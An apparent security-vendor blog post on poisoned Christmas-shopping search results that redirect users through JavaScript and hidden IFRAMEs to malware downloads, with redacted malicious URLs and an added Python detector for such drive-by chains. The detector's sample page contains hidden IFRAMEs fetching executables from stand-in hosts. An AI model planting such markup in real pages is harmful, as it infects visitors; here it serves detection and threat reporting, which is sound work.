    You better watch out and you’ll probably cry as Web threats come to town with a bang. Yes, it’s that time of the year again when we search for Christmas goodies online. Sad to say, it’s also that time of year when cyber hooligans compromise innocent Web searches such as the simple phrase “christmas gift shopping” to serve up malicious URLs via search results such as this:

    Lo and behold, one innocent search turns into a Web threat nightmare. Searching for the above phrase can lead you to the malicious URLs encircled in the image above. Clicking one of these URLs takes you to another site (http://{BLOCKED}ldgonit.com/search.php?gzapr=…) via JavaScript, which eventually leads to the download and execution of malware. Good thing Trend Micro Web Threat Protection already blocks the malicious downloads from these URLs, protecting users from infection.

    The site mentioned above also carries an IFRAME that redirects the affected system to http://{BLOCKED}id.theoreon.com/setup.php?aff_id=6025 and http://{BLOCKED}aga.com/exe.php?pid=1008, from which more malware is installed.

    Every download from these URLs hands us a different binary, which suggests the payload is re-hashed (repacked) on the server side so that no two copies share a hash. Expect more new ones to come our way this Christmas.
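The chain described above (a JavaScript redirect off the search-result page, then hidden IFRAMEs that pull the loaders) is the kind of thing a static page-triage script can surface before anyone clicks. The following is an added example written for this post, not code from the original or from Trend Micro; the sample page and every .invalid hostname in it are constructed to mirror the shapes quoted above (search.php?gzapr=, setup.php?aff_id=, exe.php?pid=), and the hidden-IFRAME heuristics (1x1 or zero-size frames, display:none, visibility:hidden) are an assumption of the example rather than something the post spells out.

```python
"""Static triage of a landing page for the redirect chain described above.

Pulls JavaScript location redirects, meta-refresh targets and IFRAMEs out of
the HTML, flags IFRAMEs that are hidden and marks every target that leaves
the page's own host. Example code written for this post; the sample page and
the .invalid hostnames below are constructed, not real captures.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# window.location = "...", location.href = '...', top.location.replace("...").
# Only the first string literal is captured, so a concatenated target yields
# its literal prefix, which is still enough to block on.
_JS_REDIRECT = re.compile(
    r"(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*"
    r"(?:=\s*|\.(?:replace|assign)\(\s*)([\"'])(.*?)\1",
    re.IGNORECASE,
)
_META_REFRESH = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


def _px(value):
    """'1', '1px', ' 0 ' -> int; anything else -> None."""
    m = re.match(r"\s*(-?\d+)", value or "")
    return int(m.group(1)) if m else None


class _Collector(HTMLParser):
    """Gathers <script> bodies, <iframe> attributes and meta-refresh targets."""

    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self.meta_refresh = [], [], []
        self._script_buf = None  # list while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script_buf = []
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_REFRESH.search(a.get("content") or "")
            if m:
                self.meta_refresh.append(m.group(1))

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def iframe_is_hidden(attrs):
    """Zero/one-pixel or CSS-hidden frames: the classic drive-by carrier (heuristic)."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    return bool(_HIDDEN_STYLE.search(attrs.get("style") or ""))


def triage_page(html, page_url):
    """Return (kind, absolute_url, leaves_page_host) for every redirect and frame."""
    c = _Collector()
    c.feed(html)
    host = urlsplit(page_url).hostname
    findings = []

    def add(kind, target):
        url = urljoin(page_url, target.strip())
        findings.append((kind, url, urlsplit(url).hostname != host))

    for body in c.scripts:
        for m in _JS_REDIRECT.finditer(body):
            add("js_redirect", m.group(2))
    for target in c.meta_refresh:
        add("meta_refresh", target)
    for attrs in c.iframes:
        if attrs.get("src"):
            add("hidden_iframe" if iframe_is_hidden(attrs) else "iframe", attrs["src"])
    return findings


def looks_like_driveby(findings):
    """Off-host JS redirect or hidden off-host IFRAME is the pattern in this post."""
    return any(kind in ("js_redirect", "hidden_iframe") and offsite
               for kind, _, offsite in findings)


# Constructed sample modelled on the chain in the post (not a real capture).
SAMPLE_URL = "http://seo-landing.invalid/christmas-gift-shopping.html"
SAMPLE_HTML = """<html><head><title>christmas gift shopping</title>
<meta http-equiv="refresh" content="30;url=http://seo-landing.invalid/more.html">
</head><body>
<script type="text/javascript">
var q = "christmas gift shopping";
window.location = "http://search-hop.invalid/search.php?gzapr=" + encodeURIComponent(q);
</script>
<iframe src="http://affiliate-drop.invalid/setup.php?aff_id=6025" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://loader-drop.invalid/exe.php?pid=1008" style="display:none;"></iframe>
<iframe src="/banner.html" width="468" height="60"></iframe>
</body></html>"""

if __name__ == "__main__":
    found = triage_page(SAMPLE_HTML, SAMPLE_URL)
    for kind, url, offsite in found:
        print(f"{kind:14} {'OFFSITE' if offsite else 'same-host':9} {url}")
    print("drive-by pattern:", looks_like_driveby(found))
```

The extractor is deliberately static: it never executes the script, so an obfuscated or runtime-built redirect will only show up as its literal prefix (or not at all), which is exactly why the post leans on URL blocking at the Web-protection layer rather than on page inspection alone.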

    Digging deeper, and extending Sunbelt's discovery of malicious URLs creeping into Christmas-related searches, we found that the .CN domains above are also being rampantly advertised in Japanese forums, blogs, BBSes and the like.

    Other compromised Christmas-y Google searches:

    • christmas gift shopping
    • christmas holiday sale
    • holiday shopping fun

    Note that there could be more variations to this theme of searches.

    Moreover, the IFRAME mentioned above also uses the so-called 404 Web threat toolkit (probably a new version) in some of its infection URL vectors:

    • http://{BLOCKED}sliksuka.com/check/version.php?t=148
    • http://{BLOCKED}sliksuka.com/check/n14041.htm
    • http://{BLOCKED}sliksuka.com/check/n14042.htm
    • http://{BLOCKED}sliksuka.com/check/n14043.htm
    • http://{BLOCKED}sliksuka.com/check/n14044.htm
    • http://{BLOCKED}sliksuka.com/check/n14045.htm
    • http://{BLOCKED}sliksuka.com/check/n14046.htm
    • http://{BLOCKED}sliksuka.com/check/n14047.htm
    • http://{BLOCKED}sliksuka.com/check/n14048.htm
    • http://{BLOCKED}mndskj.com/check/vers2.php
    • http://{BLOCKED}mndskj.com/check/tpknlkk433.php
    • http://{BLOCKED}mndskj.com/check/tpktskk2.php

    A graphical representation of this routine is as follows:

    Here are some of the malware and grayware programs that are installed on the affected system from several other Web sites where the user is redirected to:

    Ho, ho, ho, a malware-y Christmas to us all indeed. Malware is just a click away, but cautious and vigilant online shopping can keep infection at bay. Having solid Web threat protection like Trend Micro's at your back wouldn't hurt either.





    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice